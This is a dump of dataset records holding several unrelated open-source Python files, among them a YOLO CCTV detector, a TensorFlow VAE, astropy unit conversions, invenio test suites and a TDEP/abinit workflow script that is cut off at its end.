else:\n stg_log(\"entry.json does not mark a video\", \"warning\")\n break\n stg_log(\"rename folder done\")\n\n def move_video(self):\n pass\n\ndef load_args():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-a',\n '--action',\n required=True,\n type=str,\n help=\"What to do next?\"\n )\n return parser\n\ndef main():\n myHandle = videoExport()\n myHandle.get_file_tree()\n\n args = load_args().parse_args()\n the_action = args.action.replace(\" \", '')\n if the_action == \"expinfo\":\n myHandle.export_info()\n elif the_action == \"revideo\":\n myHandle.rename_video()\n elif the_action == \"refold\":\n myHandle.rename_folder()\n else:\n print(\"what do you want?\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Kumo-YZX/video-concrete","sub_path":"handleExp.py","file_name":"handleExp.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70476935606","text":"import numpy as np\n\nmatrix=np.random.rand(4,4)*10\na,c=np.split(matrix,2)\na,b=np.split(a,2,1)\nc,d=np.split(c,2,1)\nprint(matrix)\n\nresult=np.array([np.mean(a),np.mean(b),np.mean(c),np.mean(d)])\nresult=np.reshape(result,(2,2))\nprint(result)","repo_name":"xhy0303/some-homework-ppt","sub_path":"作业/Python程序设计/实验五/代码/实验/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16242372532","text":"from mapreduce.MasterWorker import MasterWorker\nfrom mapreduce.wordcount.WordCountMapWorker import WordCountMapWorker\nfrom mapreduce.wordcount.WordCountReduceWorker import WordCountReduceWorker\nfrom mapreduce.MasterWorker import MasterWorker\n\nif __name__ == '__main__':\n # Init parameters\n storage_dir = '../storage'\n output_dir = '../output'\n input_filenames = ['input-1.txt', 'input-2.txt', 'input-3.txt', 'input-4.txt', 'input-5.txt']\n intermediate_filenames = 
['intermediate-1.txt','intermediate-2.txt','intermediate-3.txt','intermediate-4.txt','intermediate-5.txt']\n output_filename = 'output.txt'\n keys = ['apple', 'banana', 'cranberry', 'durian', 'elderberry', 'fig']\n map_workers = [WordCountMapWorker() for i in range(len(input_filenames))]\n reduce_workers = [WordCountReduceWorker() for i in range(len(keys))]\n\n # Master worker\n master = MasterWorker(map_workers, reduce_workers, storage_dir, input_filenames, intermediate_filenames, output_filename, keys)\n master.assign_map_workers()\n master.assign_reduce_workers()\n master.execute()","repo_name":"alantanlc/map-reduce","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28958828361","text":"# from ultralytics import YOLO\n# import cv2\n#\n# model = YOLO('../Yolo-Weights/yolov8n.pt')\n# results = model(\"Images/3.png\", show=True)\n# cv2.waitKey(0)\n#\n# # video_path = 'path/to/video/file.mp4'\n# # cap = cv2.VideoCapture(video_path)\n\n\nfrom ultralytics import YOLO\nimport cv2\n\n# Load YOLO model\nmodel = YOLO(\"../Yolo-Weights/yolov8l.pt\")\n\n# Open video file\nvideo_path = 'cctv/cctv.mp4'\ncap = cv2.VideoCapture(video_path)\n\n# Process each frame of the video\nwhile True:\n ret, frame = cap.read()\n\n if not ret:\n break\n\n # Detect humans in the frame\n results = model(frame)\n\n # Filter out only human detections\n human_detections = results.xyxy[0][results.xyxy[0][:, -1] == 0]\n\n # Draw bounding boxes around humans\n for detection in human_detections:\n x1, y1, x2, y2, _ = detection\n cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\n\n # Display the frame with human detections\n cv2.imshow('Human Detections', frame)\n\n # Break the loop if 'q' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the video capture and close the windows\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"khavjhav/TestCCTV","sub_path":"Chapter 5 - Running Yolo/Yolo-Basics.py","file_name":"Yolo-Basics.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24008445570","text":"\"\"\"\nhttps://www.acmicpc.net/problem/11399\n\n사람들이 줄을 서는 순서에 따라 돈을 인출하는데 걸리는 최소시간 구하기\n\"\"\"\n\nN = int(input())\nP = list(map(int, input().split()))\n\nP.sort()\n\nfor k in range(1, N):\n P[k] += P[k-1]\n\nprint(sum(P))\n","repo_name":"dhwangdev/Algorithm","sub_path":"Baekjoon/Greedy/11399_LeastTimeATM.py","file_name":"11399_LeastTimeATM.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45506215484","text":"import os\nimport unittest\n\nfrom wshubsapi.hub import UnsuccessfulReplay\nfrom wshubsapi.hubs_inspector import HubsInspector\nfrom wshubsapi.test.utils.hubs_utils import remove_hubs_subclasses\n\nfrom Test.testingUtils import create_compiler_uploader_mock, create_sender_mock\nfrom libs.CompilerUploader import CompilerUploader\nfrom libs.Version import Version\nfrom libs.WSCommunication.Hubs.CodeHub import CodeHub\nfrom libs.PathsManager import PathsManager as pm\nfrom flexmock import flexmock, flexmock_teardown\n# do not remove\nimport libs.WSCommunication.Hubs\n\n\nclass TestCodeHub(unittest.TestCase):\n def setUp(self):\n HubsInspector.inspect_implemented_hubs(force_reconstruction=True)\n self.hexFilePath = 
os.path.join(pm.TEST_SETTINGS_PATH, \"CompilerUploader\", \"hex.hex\")\n self.codeHub = HubsInspector.get_hub_instance(CodeHub)\n \"\"\":type : CodeHub\"\"\"\n\n self.sender = create_sender_mock()\n\n self.originalConstruct = CompilerUploader.construct\n self.compileUploaderMock, self.CompileUploaderConstructorMock = create_compiler_uploader_mock()\n self.board = CompilerUploader.DEFAULT_BOARD\n\n def tearDown(self):\n flexmock_teardown()\n remove_hubs_subclasses()\n\n def test_construct_getsCompilerUploader(self):\n self.assertIsInstance(self.originalConstruct(), CompilerUploader)\n\n def test_construct_getsCompilerUploaderWithRightBoard(self):\n compiler1 = self.originalConstruct(\"uno\")\n compiler2 = self.originalConstruct(\"diemilanove\")\n\n self.assertEqual(compiler1.board, \"uno\")\n self.assertEqual(compiler2.board, \"diemilanove\")\n\n def test_construct_getsSameObjectIfPassedSameBoard(self):\n compiler1 = self.originalConstruct(\"uno\")\n compiler2 = self.originalConstruct(\"uno\")\n\n self.assertIs(compiler1, compiler2)\n\n def test_compile_senderIsAdvisedCompilingIsOngoing(self):\n self.sender.should_receive(\"is_compiling\").once()\n\n self.codeHub.compile(\"myCode\", self.sender)\n\n def test_compile_callsCompilerCompile(self):\n code = \"myCode\"\n (self.compileUploaderMock\n .should_receive(\"compile\")\n .once()\n .with_args(code)\n .and_return([True, None]))\n\n self.codeHub.compile(code, self.sender)\n\n def test_upload_senderIsAdvisedCodeIsUploadingWithPort(self):\n port = \"PORT\"\n self.compileUploaderMock.should_receive(\"get_port\").and_return(port).once()\n self.compileUploaderMock.should_receive(\"upload\").and_return((True, {})).once()\n\n self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n def test_upload_successfulUploadReturnsTrue(self):\n self.compileUploaderMock.should_receive(\"upload\").and_return((True, {})).once()\n\n result = self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n self.assertEqual(result, \"PORT\")\n\n def test_upload_unsuccessfulUploadReturnsErrorString(self):\n uploadReturn = (False, {\"err\": \"errorMessage\"},)\n self.compileUploaderMock.should_receive(\"upload\").and_return(uploadReturn).once()\n\n result = self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n self.assertIsInstance(result, UnsuccessfulReplay)\n self.assertEqual(result.reply, uploadReturn[1][\"err\"])\n\n def test_uploadHexUrl_successfulHexUploadCallsUploadAvrHexAndReturnsTrue(self):\n self.compileUploaderMock.should_receive(\"upload_avr_hex\").and_return((True, {})).once()\n\n result = self.codeHub.upload_hex(\"hexText\", self.board, self.sender)\n\n self.assertEqual(result, \"PORT\")\n\n def test_upload_unsuccessfulHexUploadReturnsErrorString(self):\n\n uploadReturn = (False, {\"err\": \"errorMessage\"},)\n self.compileUploaderMock.should_receive(\"upload_avr_hex\").and_return(uploadReturn).once()\n\n result = self.codeHub.upload_hex(\"hexText\", self.compileUploaderMock.board, self.sender)\n\n self.assertIsInstance(result, UnsuccessfulReplay)\n self.assertEqual(result.reply, uploadReturn[1][\"err\"])\n","repo_name":"bq/web2board","sub_path":"src/Test/unit/WSCommunication/Hubs/testCodeHub.py","file_name":"testCodeHub.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"32428524997","text":"from astropy import constants\nfrom astropy import units as u\nimport numpy as np\n\ndef tb2s(tb, nu):\n \"\"\"Convert blackbody temperature to spectral 
radiance s_nu at frequency nu.\n\n Args:\n tb (Quantity): Blackbody temperature\n nu (Quantity): frequency where the spectral radiance is evaluated\n\n Returns:\n (Quantity) s_nu with same dimensions as tb\n nominal unit: W*sr−1*m−2*Hz−1\n \"\"\"\n h = constants.h\n c = constants.c\n k_b = constants.k_B\n nu = nu.to(u.Hz)\n tb = tb.to(u.K)\n x = h * nu / (k_b * tb)\n return 2 * h * nu**3 / c**2 / (np.exp(x) - 1)\n\n\ndef s2tcmb(s_nu, nu):\n \"\"\"Convert spectral radiance s_nu at frequency nu to t_cmb.\n\n t_cmb is defined in the CMB community as the offset from the\n mean CMB temperature assuming a linear relation between t_cmb\n and s_nu, the t_cmb/s_nu slope is evalutated at the mean CMB\n temperature.\n\n Args:\n s_nu (Quantity): spectral radiance s_nu (nominal unit: W*sr−1*m−2*Hz−1)\n nu (Quantity): frequency where the evaluation is perfomed\n\n Returns:\n (Quantity) t_cmb with same dimensions as tb.\n\n \"\"\"\n T_cmb = 2.72548 * u.K # K from Fixsen, 2009, ApJ 707 (2): 916–920\n h = constants.h\n c = constants.c\n k_b = constants.k_B\n nu = nu.to(u.Hz)\n x = h * nu / (k_b * T_cmb)\n\n slope = 2 * k_b * nu**2 / c**2 * ((x.value / 2) / np.sinh(x.value / 2)) ** 2\n return s_nu / slope\n\n\ndef tb2tcmb(tb, nu):\n \"\"\"Convert blackbody temperature to t_cmb as defined above.\n\n Args:\n tb (Quantity): Blackbody temperature\n nu (Quantity): frequency where the spectral radiance is evaluated\n\n Returns:\n (Quantity) t_cmb with same dimensions as tb\n\n \"\"\"\n s_nu = tb2s(tb, nu)\n result = s2tcmb(s_nu, nu)\n return result.decompose()\n","repo_name":"simonsobs/sotodlib","sub_path":"sotodlib/toast/ops/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"28018350559","text":"#!/usr/bin/env python\nfrom http_res import HttpRequest\nclass API(HttpRequest):\n def __init__(self, nodes = None, **kwargs):\n super().__init__(nodes=nodes, **kwargs)\n\n def get_info(self):\n body= dict()\n return self.http_call(\n api='chain',\n interface='get_info',\n body=body\n )\n\n\n\nif __name__ == '__main__':\n nodes = API(['http://fullnode.eoshenzhen.io:8888'])\n print(nodes.get_info())","repo_name":"EOShenzhen/EOS_Python_API","sub_path":"eosapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17156216784","text":"# https://github.com/hwalsuklee/tensorflow-mnist-VAE/blob/master/vae.py\nimport numpy as np\nimport utility\nimport matplotlib.pyplot as plt\nimport sys\nimport tensorflow as tf\nfrom sklearn.model_selection import KFold\nEPS = 1e-10\nimport pdb\n\n# ------------------------------------------------------------------------------\n# Load Data\n# ------------------------------------------------------------------------------\n\npath = '/Users/matthewolson/Documents/Data/Fashion'\nimages, labels = utility.read_fashion(range(10), dataset='training', path=path)\n\n\n# rescale images to be between 0 / 1\nimages = images / float(images.max())\n\n# make some plots\nix = np.random.permutation(len(images))[:20]\nutility.plot_multiple_images(images[ix].reshape(-1, 28, 28), 4, 5)\nplt.savefig('data_images.png', format='png', dpi=300)\nplt.show()\n\n# ------------------------------------------------------------------------------\n# Build VAE Model\n# ------------------------------------------------------------------------------\n\n\ndef 
gaussian_encoder(X, n_hidden, n_latent):\n with tf.variable_scope('guassian_encoder'):\n he_init = tf.contrib.layers.variance_scaling_initializer()\n hidden1 = tf.layers.dense(X, n_hidden, activation=tf.nn.elu,\n kernel_initializer=he_init)\n hidden2 = tf.layers.dense(\n hidden1, n_hidden, activation=tf.nn.tanh, kernel_initializer=he_init)\n gaussian_params = tf.layers.dense(hidden2, n_latent * 2,\n kernel_initializer=he_init)\n mean = gaussian_params[:, :n_latent]\n stddev = EPS + tf.nn.softplus(gaussian_params[:, n_latent:])\n return mean, stddev\n\n\ndef bernoulli_decoder(Z, n_hidden, n_output):\n with tf.variable_scope('bernoulli_decoder'):\n # pdb.set_trace()\n he_init = tf.contrib.layers.variance_scaling_initializer()\n hidden1 = tf.layers.dense(Z, n_hidden, activation=tf.nn.tanh,\n kernel_initializer=he_init)\n hidden2 = tf.layers.dense(hidden1, n_hidden, activation=tf.nn.elu,\n kernel_initializer=he_init)\n p = tf.layers.dense(hidden2, n_output, activation=tf.nn.sigmoid,\n kernel_initializer=he_init)\n return p\n\n\ndef autoencoder(X, n_input, n_hidden, n_latent):\n # pdb.set_trace()\n # encoding\n mu, sigma = gaussian_encoder(X, n_hidden, n_latent)\n\n # reparametrization technique\n z = mu + sigma * tf.random_normal(tf.shape(mu), 0.0, 1)\n\n # decoding\n p = bernoulli_decoder(z, n_hidden, n_input)\n\n # loss\n likelihood = tf.reduce_sum(X * tf.log(p) + (1 - X) * tf.log(1 - p), 1)\n kl_divergence = 0.5 * \\\n tf.reduce_sum(tf.square(mu) + tf.square(sigma) -\n tf.log(EPS + tf.square(sigma)) - 1, 1)\n likelihood = tf.reduce_mean(likelihood)\n kl_divergence = tf.reduce_mean(kl_divergence)\n\n loss = kl_divergence - likelihood\n return p, z, loss, -likelihood, kl_divergence\n\n# ------------------------------------------------------------------------------\n# Train Model\n# ------------------------------------------------------------------------------\n\nn_hidden = 500\nn_inputs = 28 * 28\nn_latent = 50\n\nn_epochs = 500\nbatch_size = 128\nlearning_rate = 0.001\n\nutility.reset_graph()\nX = tf.placeholder(tf.float32, shape=[None, n_inputs], name='img')\np, z, loss, neg_likelihood, kl_divergence = autoencoder(\n X, n_inputs, n_hidden, n_latent)\noptimizer = tf.train.AdamOptimizer(learning_rate)\ntraining_op = optimizer.minimize(loss)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n sess.run(init)\n\n for epoch in xrange(n_epochs):\n kf = KFold(n_splits=len(images) // batch_size, shuffle=True)\n batches = kf.split(images)\n for _, batch in batches:\n sess.run(training_op, feed_dict={X: images[batch]})\n loss_total, loss_lhood, loss_kl = sess.run([loss, neg_likelihood,\n kl_divergence],\n feed_dict={X: images})\n print(\"Epoch %d: L_tot %03.2f L_likelihood %03.2f L_divergence %03.2f\" % (\n epoch, loss_total, loss_lhood, loss_kl))\n saver.save(sess, 'fashion_vae_50.ckpt')\n\n# ------------------------------------------------------------------------------\n# Show Distribution of Labelled Data\n# ------------------------------------------------------------------------------\n\n# pass z through with X, label by color\nsaver = tf.train.Saver()\nix = np.random.permutation(len(images))[:1000]\nwith tf.Session() as sess:\n saver.restore(sess, 'fashion_vae_2.ckpt')\n z_vals = sess.run(z, feed_dict={X: images[ix]})\n\nlabels_set = list(set(labels[ix]))\nfor i in xrange(len(labels_set)):\n clothing_ix = labels[ix] == labels_set[i]\n plt.scatter(z_vals[clothing_ix, 0], z_vals[clothing_ix, 1], alpha=0.9)\nplt.savefig('latent_images.png', 
format='png', dpi=300)\nplt.show()\n\n\n# ------------------------------------------------------------------------------\n# Generate Examples\n# ------------------------------------------------------------------------------\n\n# pass p through with X\n\nn_images = 20\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n init.run()\n saver.restore(sess, 'fashion_vae_50.ckpt')\n img = sess.run(p, feed_dict={z: np.random.randn(20, 50)})\n\nutility.plot_multiple_images(img.reshape(-1, 28, 28), 4, 5)\nplt.savefig('random_images.png', format='png', dpi=300)\nplt.show()\n\n# ------------------------------------------------------------------------------\n# JUNK\n# ------------------------------------------------------------------------------\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nsc = StandardScaler()\nsc.fit(images)\nimages_ = sc.fit_transform(images)\npca = PCA(n_components=2)\npca.fit(images_)\n\nix = np.random.permutation(len(images))[:3000]\nU = pca.fit_transform(images_)\nU = U[ix]\n\nlabels_set = list(set(labels[ix]))\nfor i in xrange(len(labels_set)):\n clothing_ix = labels[ix] == labels_set[i]\n plt.scatter(U[clothing_ix, 0], U[clothing_ix, 1], alpha=0.9)\nplt.savefig('pca_images.png', format='png', dpi=300)\nplt.show()\n","repo_name":"molson2/DeepLearning","sub_path":"Week5/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":6404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19290322835","text":"# Create a method that find the 5 most common lottery numbers in lottery.csv\nimport re\n\n\ndef five_most_frequent(file_name, top_num):\n resullt = []\n with open(file_name, \"r\") as f:\n contents = f.readlines()\n num_count = {}\n for line in contents:\n lottery_num = re.search(r\"Ft;([\\d]{1,2};[\\d]{1,2};[\\d]{1,2};[\\d]{1,2};[\\d]{1,2})\", line).group(1)\n for num in lottery_num.split(\";\"):\n try:\n num_count[num] += 1\n except:\n num_count[num] = 1\n sorted_num = sorted(num_count.items(), key=lambda x: x[1], reverse=True)\n\n for i in range(top_num):\n resullt.append(sorted_num[i][0])\n return resullt\n\n\nprint(\n five_most_frequent(\"C:\\\\Users\\\\Yu_Wang\\\\projects\\\\greenfox\\\\yuuu1234\\\\DSA-2019\\\\week-02\\\\day-2\\\\lotterty-file\", 5))\n\n","repo_name":"green-fox-academy/yuuu1234","sub_path":"DSA-2019/week-02/day-2/count_lottery.py","file_name":"count_lottery.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73617869046","text":"from invenio_access.permissions import system_identity\nfrom invenio_communities import current_communities\nfrom invenio_communities.communities.records.api import Community\nfrom invenio_communities.members import Member\nfrom invenio_requests import current_requests_service\nfrom invenio_requests.records import Request\n\nfrom invenio_rdm_records.cli import (\n create_records_custom_field,\n custom_field_exists_in_records,\n)\nfrom invenio_rdm_records.fixtures.demo import create_fake_community, create_fake_record\nfrom invenio_rdm_records.fixtures.tasks import (\n create_demo_community,\n create_demo_inclusion_requests,\n create_demo_invitation_requests,\n create_demo_record,\n get_authenticated_identity,\n)\nfrom invenio_rdm_records.proxies import current_rdm_records_service\nfrom invenio_rdm_records.records import RDMDraft, RDMRecord\nfrom invenio_rdm_records.requests import CommunitySubmission\n\n\ndef 
test_create_fake_demo_draft_record(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo record creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_record(user_id, create_fake_record(), publish=False)\n RDMDraft.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n drafts = current_rdm_records_service.search_drafts(\n user_identity, is_published=False, q=\"versions.index:1\"\n )\n assert drafts.total > 0\n\n create_demo_record(user_id, create_fake_record(), publish=True)\n RDMRecord.index.refresh()\n\n records = current_rdm_records_service.search(user_identity)\n assert records.total > 0\n\n\ndef test_create_fake_demo_communities(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo communities creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_community(user_id, create_fake_community())\n Community.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n communities = current_communities.service.search(user_identity)\n assert communities.total > 0\n\n\ndef test_create_fake_demo_inclusion_requests(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo inclusion requests creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_record(user_id, create_fake_record(), publish=False)\n RDMDraft.index.refresh()\n create_demo_community(user_id, create_fake_community())\n Community.index.refresh()\n\n create_demo_inclusion_requests(user_id, 1)\n Request.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n _t = CommunitySubmission.type_id\n reqs = current_requests_service.search(user_identity, type=_t)\n assert reqs.total > 0\n\n\ndef test_create_fake_demo_invitation_requests(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo invitation requests creation works without failing.\"\"\"\n first_user_id = users[0].id\n\n create_demo_record(first_user_id, create_fake_record(), publish=True)\n RDMDraft.index.refresh()\n comm = create_demo_community(first_user_id, create_fake_community())\n Community.index.refresh()\n user_identity = get_authenticated_identity(first_user_id)\n communities = current_communities.service.search(user_identity)\n comm = communities.to_dict()[\"hits\"][\"hits\"][0]\n\n other_user_id = users[1].id\n create_demo_invitation_requests(other_user_id, 1)\n Member.index.refresh()\n\n service = current_communities.service.members\n reqs = service.search_invitations(system_identity, comm[\"id\"])\n assert reqs.total > 0\n\n\ndef test_create_records_custom_fields(app, location, db, search_clear, cli_runner):\n \"\"\"Assert that custom fields mappings are created for records.\"\"\"\n result = cli_runner(create_records_custom_field, \"-f\", \"cern:myfield\")\n assert result.exit_code == 0\n\n record_mapping_field = list(RDMRecord.index.get_mapping().values())[0][\"mappings\"][\n \"properties\"\n ][\"custom_fields\"]\n draft_mapping_field = list(RDMDraft.index.get_mapping().values())[0][\"mappings\"][\n \"properties\"\n ][\"custom_fields\"]\n expected_value = {\n \"dynamic\": \"true\",\n \"properties\": {\n \"cern:myfield\": {\"type\": \"text\", \"fields\": {\"keyword\": {\"type\": \"keyword\"}}}\n },\n }\n assert record_mapping_field == expected_value\n assert draft_mapping_field == expected_value\n\n # check for existence\n RDMRecord.index.refresh()\n RDMDraft.index.refresh()\n\n result = cli_runner(custom_field_exists_in_records, \"-f\", 
\"cern:myfield\")\n assert result.exit_code == 0\n assert \"Field cern:myfield exists\" in result.output\n\n result = cli_runner(custom_field_exists_in_records, \"-f\", \"unknownfield\")\n assert result.exit_code == 0\n assert \"Field unknownfield does not exist\" in result.output\n","repo_name":"inveniosoftware/invenio-rdm-records","sub_path":"tests/fixtures/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"29490622673","text":"print('制作者:Liu Mingshuai\\n时间:2020年2月22日\\n')\ndangling = ['/*/*', 'qwertyuiop123']\n\n\ndef yodels():\n tries = 3\n while tries > 0:\n yogurt = input('请输入密码:')\n zenning = yogurt == dangling[-1]\n xatom = yogurt == dangling[0]\n if zenning:\n print('加载成功')\n elif xatom:\n xena = input('请输入新密码:')\n dangling.append(xena)\n print('密码修改成功')\n yodels()\n else:\n print('密码错误,请重新输入')\n tries = tries-1\n print('你还有', tries, '次机会.')\n else:\n print('密码错误,你的账户已被锁定')\n\n\nyodels()\n","repo_name":"murongqianxi/Python","sub_path":"code/Applets/User login.py","file_name":"User login.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8892862128","text":"from utils.material import material\nfrom utils.job_manage import managing_job\nfrom utils.read_abo import abo_done\nfrom utils.utilities import *\nimport os\nfrom os.path import join\nimport glob\nimport subprocess as sp\nfrom collections import defaultdict\nimport time\nimport re\nfrom datetime import datetime\nimport numpy as np\nfrom periodictable import elements\n\n\n\ndef tdep_cell(mpid, idx, dims, temp, max_freq, jobdir):\n jdir = join(jobdir,str(mpid))\n content, check_dict, lattice, frac, cart, znucls, typats = read_uc_abinit(jdir)\n write_uc_vasp(lattice, cart, znucls, typats, jdir)\n original_dir = os.getcwd()\n print(\"directory before tdep:\", os.getcwd())\n os.chdir(jdir)\n print(\"directory for tdep:\", os.getcwd())\n if isinstance(dims, list):\n nx,ny,nz = dims\n os.system(f'generate_structure --dimensions {nx} {ny} {nz}')\n elif isinstance(dims, int):\n os.system(f'generate_structure -na {dims}')\n os.system(f'cp outfile.ssposcar infile.ssposcar')\n os.system(f'canonical_configuration --quantum --maximum_frequency {max_freq} --temperature {temp} -n 1 --output_format 2')\n os.system(f'cp abinput_conf0001 supercell-{idx:0{5}d}.in')\n os.chdir(original_dir)\n combine_header_abinput(mpid, idx, jobdir) #!\n print(\"directory after tdep:\", os.getcwd())\n\n\ndef tdep_next_cell(mpid, dims, temp, max_freq, jobdir, stdep=False):\n jdir = join(jobdir,str(mpid))\n idx = count_files(jdir, 'supercell-') + 1\n if stdep:\n pass\n # TODO: sTDEP\n else:\n tdep_cell(mpid, idx, dims, temp, max_freq, jobdir)\n\n\ndef tdep_complete_cells(mpid, n_td, dims, temp, max_freq, jobdir, stdep=False):\n for i in range(n_td):\n tdep_next_cell(mpid, dims, temp, max_freq, jobdir, stdep)\n\n\ndef tdep_cells_all(mpids, r_ss, dims, temp, max_freq, jobdir, stdep=False):\n for mpid in mpids:\n jdir = join(jobdir,str(mpid))\n original_dir = os.getcwd()\n print(\"home dir:\", os.getcwd())\n os.chdir(jdir)\n print(\"jdir:\", os.getcwd())\n os.system(f'rm ./supercell-*.in')\n os.chdir(original_dir)\n print(\"home dir:\", os.getcwd())\n n_p3 = count_files(join(jobdir, str(mpid), 'phono3py'), 'supercell-')\n n_td = int(n_p3 * r_ss)\n tdep_complete_cells(mpid, n_td, dims, temp, max_freq, jobdir, stdep)\n\ndef 
combine_header_abinput(mpid, idx, jobdir):\n # Define the filenames\n jdir = join(jobdir,str(mpid))\n header_filename = join(jdir, 'header.in') \n supercell_filename = join(jdir, f'supercell-{idx:0{5}d}.in') \n output_filename = join(jdir, f'disp-{idx:0{5}d}.in') \n\n # Read the contents of the header file\n with open(header_filename, 'r') as header_file:\n header_contents = header_file.readlines()\n\n # Read the contents of the supercell file and filter out lines starting with 'mode'\n with open(supercell_filename, 'r') as supercell_file:\n supercell_contents = [line for line in supercell_file if not 'mode' in line]\n\n # Combine the contents\n combined_contents = header_contents + supercell_contents\n\n # Write the combined contents to the output file\n with open(output_filename, 'w') as output_file:\n output_file.writelines(combined_contents)\n\n print(f\"Combined file saved as {output_filename}.\")\n\n\ndef read_uc_abinit(jdir):\n with open(join(jdir, \"pc.in\"), \"r\") as f:\n content = f.readlines()\n content = [c[:-1] if c.endswith('\\n') else c for c in content]\n print(content)\n checklist = ['xred', 'rprim', 'typat', 'znucl']\n check_dict = {}\n for c in checklist:\n for i, line in enumerate(content):\n if c in line:\n check_dict[c]=i\n print(check_dict)\n lattice = np.array([[float(item) for item in content[check_dict['rprim']+i+1].split()] for i in range(3)])\n # print('lattice: ', lattice)\n frac = np.array([[float(item) for item in content[check_dict['xred']+i+1].split()] for i in range(check_dict['rprim']-check_dict['xred']-1)])\n # print('frac: ', frac)\n cart = frac@lattice\n # print('cart: ', cart)\n znucls = [elements[int(item)].symbol for item in content[check_dict['znucl']+1].split()]\n # print('znucls: ', znucls)\n typats = [int(item)-1 for item in content[check_dict['typat']+1].split()]\n # print('typats: ', typats)\n return content, check_dict, lattice, frac, cart, znucls, typats\n\ndef write_uc_vasp(lattice, cart, znucls, typats, jdir):\n lines = [\" \".join(znucls), '1.000']\n for row in lattice:\n row_str = ' ' + \"\\t\".join(map(str, row))\n lines.append(row_str)\n lines.append(' ' + \" \".join([znucls[i] for i in typats]))\n lines.append(' ' + \" \".join(['1' for i in typats]))\n lines.append('Cartesian')\n for row in cart:\n row_str = ' ' + \"\\t\".join(map(str, row))\n lines.append(row_str)\n \n with open(join(jdir, \"infile.ucposcar\"), \"w\") as f:\n for line in lines:\n f.write(line + \"\\n\")\n\n\ndef get_infile_positions(mpid, idx, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, f'disp-{idx:0{5}d}.in')\n output_filename = join(jdir, 'infile.positions')\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n output_lines = []\n found_xred = False\n for line in lines:\n if 'xred' in line:\n found_xred = True\n continue\n if 'vel' in line:\n break\n if found_xred and line.strip() and not line.startswith('#'):\n output_lines.append(line.split('#')[0].strip())\n with open(output_filename, 'w') as output_file:\n output_file.write('\\n'.join(output_lines))\n \ndef get_infile_forces(mpid, idx, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, f'disp-{idx:0{5}d}.abo')\n output_filename = join(jdir, 'infile.forces')\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n\n output_lines = []\n found_cartesian_forces = False\n\n check_dict={}\n for i, line in enumerate(lines):\n if 'cartesian_forces' in line:\n check_dict['start']=i+1\n if 'force_length_stats' in 
